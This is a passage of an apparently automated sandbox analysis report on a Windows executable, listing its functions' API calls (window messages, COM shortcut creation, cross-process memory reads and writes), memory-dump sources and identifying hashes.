                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                        • String ID:
                                                                        • API String ID: 2833360925-0
                                                                        • Opcode ID: 58473ac1fb914adbc61e73349692caf418150f3d3ee578185f910bb19a8c9263
                                                                        • Instruction ID: 6686e85d7cfe814274ba8e9c8802bdb0001cfe472f603256652c9b3f749638a0
                                                                        • Opcode Fuzzy Hash: 58473ac1fb914adbc61e73349692caf418150f3d3ee578185f910bb19a8c9263
                                                                        • Instruction Fuzzy Hash: 97012531C0962DEBDF00AFE6DC48AEEBB79FB88711F001495E582B2650DB309654D7A1
                                                                        Function 00EAAAC3 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00EAAADA
                                                                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00EAAAE4
                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00EAAAF3
                                                                        • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00EAAAFA
                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00EAAB10
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                        • String ID:
                                                                        • API String ID: 44706859-0
                                                                        • Opcode ID: 99243f5029d3cd67d4b65c59b84bb5329888a533e335a1ea4aca05f700cf44e7
                                                                        • Instruction ID: 756bb9ddaabce42b5d15b0454c70ea87ebdce0d152fada60b7ec63cdc0297c59
                                                                        • Opcode Fuzzy Hash: 99243f5029d3cd67d4b65c59b84bb5329888a533e335a1ea4aca05f700cf44e7
                                                                        • Instruction Fuzzy Hash: 59F04F71205308AFEB110FA5EC88E773B6EFF8A758F04002AF941EB190CB60A805DA71
                                                                        Function 00EAAA62 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00EAAA79
                                                                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00EAAA83
                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00EAAA92
                                                                        • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00EAAA99
                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00EAAAAF
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                        • String ID:
                                                                        • API String ID: 44706859-0
                                                                        • Opcode ID: 726d3c98e757c997aaa78a47b7e5e49b51a902b98be109d5d27d1898b40f0cd1
                                                                        • Instruction ID: 162b8fa6ef5611dbe2e28574ce445d4663bb75afb89510955cb22b13d757694c
                                                                        • Opcode Fuzzy Hash: 726d3c98e757c997aaa78a47b7e5e49b51a902b98be109d5d27d1898b40f0cd1
                                                                        • Instruction Fuzzy Hash: D9F0AF31205304AFEB111FA5AC88E773FAEFF8A798F040029F901EB190DB60AC05DB61
                                                                        Function 00EAEC80 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00EAEC94
                                                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 00EAECAB
                                                                        • MessageBeep.USER32(00000000), ref: 00EAECC3
                                                                        • KillTimer.USER32(?,0000040A), ref: 00EAECDF
                                                                        • EndDialog.USER32(?,00000001), ref: 00EAECF9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                        • String ID:
                                                                        • API String ID: 3741023627-0
                                                                        • Opcode ID: fe2ec2f7f47f4f91f950831242963fb18ec77781df0e46f4f46b126dcfe747df
                                                                        • Instruction ID: 44586a6b7242c55726096d6a478d9e9be6e7fed4de27449ea3257312616fba1e
                                                                        • Opcode Fuzzy Hash: fe2ec2f7f47f4f91f950831242963fb18ec77781df0e46f4f46b126dcfe747df
                                                                        • Instruction Fuzzy Hash: 6D01D130500744EFEB246B11DE4EBA6BBB9FB44709F001559B582B91E1DBF0BA48CB40
                                                                        Function 00E8B0AB Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • EndPath.GDI32(?), ref: 00E8B0BA
                                                                        • StrokeAndFillPath.GDI32(?,?,00EEE680,00000000,?,?,?), ref: 00E8B0D6
                                                                        • SelectObject.GDI32(?,00000000), ref: 00E8B0E9
                                                                        • DeleteObject.GDI32 ref: 00E8B0FC
                                                                        • StrokePath.GDI32(?), ref: 00E8B117
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                        • String ID:
                                                                        • API String ID: 2625713937-0
                                                                        • Opcode ID: 6efddfad35ab56902fb391ea17aebb9b191b3aafc4b8bc73296640b088b9066d
                                                                        • Instruction ID: b9f8a2db95a84ffa38ba53e3efbd5cc11adc84becdf70ee3fd05de79d8d2dd03
                                                                        • Opcode Fuzzy Hash: 6efddfad35ab56902fb391ea17aebb9b191b3aafc4b8bc73296640b088b9066d
                                                                        • Instruction Fuzzy Hash: 61F0B630005648EFDB22AFA6ED0E7A53F66B751376F089315E429691F0CB318969EF60
                                                                        Function 00EBF23D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277comCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CoInitialize.OLE32(00000000), ref: 00EBF2DA
                                                                        • CoCreateInstance.OLE32(00EFDA7C,00000000,00000001,00EFD8EC,?), ref: 00EBF2F2
                                                                        • CoUninitialize.OLE32 ref: 00EBF555
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: CreateInitializeInstanceUninitialize
                                                                        • String ID: .lnk
                                                                        • API String ID: 948891078-24824748
                                                                        • Opcode ID: 1e39683e69589e42222bd36af6ee8dcb87a20f21ed6292c6bae4e2ed0106a192
                                                                        • Instruction ID: 23b4d7c27d3eedb51e508d5623606425844f72b9d380e328aea673048a4c0025
                                                                        • Opcode Fuzzy Hash: 1e39683e69589e42222bd36af6ee8dcb87a20f21ed6292c6bae4e2ed0106a192
                                                                        • Instruction Fuzzy Hash: BDA11971104201AFD301EF64CC81EABB7ECEF99714F00995DF659A71A2EB70EA09CB52
                                                                        Function 00EBE7DD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00E7660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E753B1,?,?,00E761FF,?,00000000,00000001,00000000), ref: 00E7662F
                                                                        • CoInitialize.OLE32(00000000), ref: 00EBE85D
                                                                        • CoCreateInstance.OLE32(00EFDA7C,00000000,00000001,00EFD8EC,?), ref: 00EBE876
                                                                        • CoUninitialize.OLE32 ref: 00EBE893
                                                                          • Part of subcall function 00E7936C: __swprintf.LIBCMT ref: 00E793AB
                                                                          • Part of subcall function 00E7936C: __itow.LIBCMT ref: 00E793DF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                        • String ID: .lnk
                                                                        • API String ID: 2126378814-24824748
                                                                        • Opcode ID: 95cd09b6fd57c9717a87954b24a2532d59180630f08ef444e29a47732a680c1a
                                                                        • Instruction ID: b57e0d6c0a6d193f390d52fcc32440a30a8cf714647ceb79ba9505674449ff52
                                                                        • Opcode Fuzzy Hash: 95cd09b6fd57c9717a87954b24a2532d59180630f08ef444e29a47732a680c1a
                                                                        • Instruction Fuzzy Hash: 6DA136756043019FCB14DF14C8849AEBBE5FF89314F148998F99AAB3A2CB31ED45CB91
                                                                        Function 00E9325D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __startOneArgErrorHandling.LIBCMT ref: 00E932ED
                                                                          • Part of subcall function 00E9E0D0: __87except.LIBCMT ref: 00E9E10B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorHandling__87except__start
                                                                        • String ID: pow
                                                                        • API String ID: 2905807303-2276729525
                                                                        • Opcode ID: f2eafc72342c1ea7d99b38abdd261fab323d0872d5c50e2a75708f5389ce9fea
                                                                        • Instruction ID: 43a742eb1c39c19ce69a48bdd806c73910bf49f1216eb8f464131314ed5f4845
                                                                        • Opcode Fuzzy Hash: f2eafc72342c1ea7d99b38abdd261fab323d0872d5c50e2a75708f5389ce9fea
                                                                        • Instruction Fuzzy Hash: 86517931A0920596CF11F724C9413BE3BD4AB40718F20BD69F5E5A23F9EF348DC8AA42
                                                                        Function 00EB4606 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,00F0DC50,?,0000000F,0000000C,00000016,00F0DC50,?), ref: 00EB4645
                                                                          • Part of subcall function 00E7936C: __swprintf.LIBCMT ref: 00E793AB
                                                                          • Part of subcall function 00E7936C: __itow.LIBCMT ref: 00E793DF
                                                                        • CharUpperBuffW.USER32(?,?,00000000,?), ref: 00EB46C5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: BuffCharUpper$__itow__swprintf
                                                                        • String ID: REMOVE$THIS
                                                                        • API String ID: 3797816924-776492005
                                                                        • Opcode ID: 620c79b3153232b703f2946454f7d4e1f3e0904c42a2fd680256f6047ddfa04e
                                                                        • Instruction ID: 3c6960927a804b56c8396b46661b7f952e3ca55e832a75c199e0dc64c3ca7d24
                                                                        • Opcode Fuzzy Hash: 620c79b3153232b703f2946454f7d4e1f3e0904c42a2fd680256f6047ddfa04e
                                                                        • Instruction Fuzzy Hash: 1C415DB4A002199FCF01EF64C881AEEB7F5FF49304F149469E91ABB2A2DB349D45CB50
                                                                        Function 00EAC189 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00EB430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00EABC08,?,?,00000034,00000800,?,00000034), ref: 00EB4335
                                                                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00EAC1D3
                                                                          • Part of subcall function 00EB42D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00EABC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00EB4300
                                                                          • Part of subcall function 00EB422F: GetWindowThreadProcessId.USER32(?,?), ref: 00EB425A
                                                                          • Part of subcall function 00EB422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00EABBCC,00000034,?,?,00001004,00000000,00000000), ref: 00EB426A
                                                                          • Part of subcall function 00EB422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00EABBCC,00000034,?,?,00001004,00000000,00000000), ref: 00EB4280
                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00EAC240
                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00EAC28D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                        • String ID: @
                                                                        • API String ID: 4150878124-2766056989
                                                                        • Opcode ID: 9fe0a7f669977d609ec96a0f6a551592eafc4f1fce8a0f0dd895b70ab507b2c0
                                                                        • Instruction ID: 7ab5560a0397ecffa2f663c40ff39924ac294cd44cd5fb23c731e014692ce4cd
                                                                        • Opcode Fuzzy Hash: 9fe0a7f669977d609ec96a0f6a551592eafc4f1fce8a0f0dd895b70ab507b2c0
                                                                        • Instruction Fuzzy Hash: 0E415BB2900218AFDB11DFA4CD81BEEBBB8EF09300F104095FA45BB191DA716E45DB61
                                                                        Function 00EDA63F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00F0DC00,00000000,?,?,?,?), ref: 00EDA6D8
                                                                        • GetWindowLongW.USER32 ref: 00EDA6F5
                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00EDA705
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Long
                                                                        • String ID: SysTreeView32
                                                                        • API String ID: 847901565-1698111956
                                                                        • Opcode ID: f226e0bb2e648a1c5db834926d7e0a4fa44216b076559aa0618015b59f1fc94f
                                                                        • Instruction ID: 7b997cdf3e35f86581e8017cd5943ecbbad0c677b60ed9aed10d787af3e492a8
                                                                        • Opcode Fuzzy Hash: f226e0bb2e648a1c5db834926d7e0a4fa44216b076559aa0618015b59f1fc94f
                                                                        • Instruction Fuzzy Hash: 5431CE31100205AFDB119E78CC41BEA7BA9FB49338F285726F879A32E0C770E9519B51
                                                                        Function 00EC5180 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 96networkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 00EC5190
                                                                        • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 00EC51C6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: CrackInternet_memset
                                                                        • String ID: |$D
                                                                        • API String ID: 1413715105-465884809
                                                                        • Opcode ID: 49d1c739e1d182ca42f64947070a0f5844664dbdff04515372022d61b60685db
                                                                        • Instruction ID: d53595a93dd512a4c33621ddda064d57fb236abd6c5ef57181f1ecc639feeeef
                                                                        • Opcode Fuzzy Hash: 49d1c739e1d182ca42f64947070a0f5844664dbdff04515372022d61b60685db
                                                                        • Instruction Fuzzy Hash: 67313972800109ABCF01AFE4CC45EEE7FB9FF18704F105019E809B6166DB31AA46CBA0
                                                                        Function 00EDA0D6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00EDA15E
                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00EDA172
                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00EDA196
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Window
                                                                        • String ID: SysMonthCal32
                                                                        • API String ID: 2326795674-1439706946
                                                                        • Opcode ID: f89b1d8f01ef78371a9426d688ab615ea8ab79089f127dac686c8e3f793d6500
                                                                        • Instruction ID: 5255000a88f92dcdd2a0a4c5f50b9f160bcd05149aed72f4f0209aa965bec87f
                                                                        • Opcode Fuzzy Hash: f89b1d8f01ef78371a9426d688ab615ea8ab79089f127dac686c8e3f793d6500
                                                                        • Instruction Fuzzy Hash: 9021F372100218ABDF119F94CC42FEA3B7AFF48724F041114FA55BB2D0D6B1AC51CB90
                                                                        Function 00EDA88A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00EDA941
                                                                        • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00EDA94F
                                                                        • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00EDA956
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$DestroyWindow
                                                                        • String ID: msctls_updown32
                                                                        • API String ID: 4014797782-2298589950
                                                                        • Opcode ID: fa4f5c55620c08db9082f9704a599c2c6349d4a75259d426a81c3a6d22d55a78
                                                                        • Instruction ID: 0d05e7b935b6b3bdbbe7b91dbb596187e6021a273529fb1062e17e4368ddcec5
                                                                        • Opcode Fuzzy Hash: fa4f5c55620c08db9082f9704a599c2c6349d4a75259d426a81c3a6d22d55a78
                                                                        • Instruction Fuzzy Hash: CE21A4B5600209AFDB10EF54DC92D7737ADEF9A368B051059FA04AB361CB30EC12DB61
                                                                        Function 00ED99A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00ED9A30
                                                                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00ED9A40
                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00ED9A65
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$MoveWindow
                                                                        • String ID: Listbox
                                                                        • API String ID: 3315199576-2633736733
                                                                        • Opcode ID: 512c92d4e7680a03f6aaf0ed5cc6c75d2753c51d424c9aea3f5b83cd79ac8ccd
                                                                        • Instruction ID: c9d841d1babeb3b2b4637436baa452665f20bab937a4c0fbcb12d74b40a96bfa
                                                                        • Opcode Fuzzy Hash: 512c92d4e7680a03f6aaf0ed5cc6c75d2753c51d424c9aea3f5b83cd79ac8ccd
